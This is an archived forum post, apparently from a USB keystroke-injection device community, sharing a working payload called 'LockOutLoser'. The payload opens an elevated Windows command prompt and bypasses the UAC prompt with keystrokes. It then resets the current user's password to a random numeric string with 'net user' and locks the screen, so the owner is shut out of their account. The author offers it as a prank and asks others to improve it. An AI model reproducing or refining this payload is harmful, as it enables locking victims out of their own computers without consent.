Jump to content

LockOutLoser


jblk01

Recommended Posts

I was bored earlier today and whipped this thing out, it sets the current users password to a random numeric string then locks the screen.

 

ATTACKMODE HID

# They don't lock their system(s)?  Let's do it for them. :)
# Plz improve this.

LED SPECIAL5
Q GUI
Q DELAY 500
Q STRING cmd
Q DELAY 500
Q CTRL-SHIFT ENTER
Q DELAY 500
Q LEFTARROW
Q DELAY 500
Q ENTER
Q STRING 'net user %username% %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%'
Q ENTER
Q STRING exit
Q ENTER
Q GUI l
LED CLEANUP

 

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...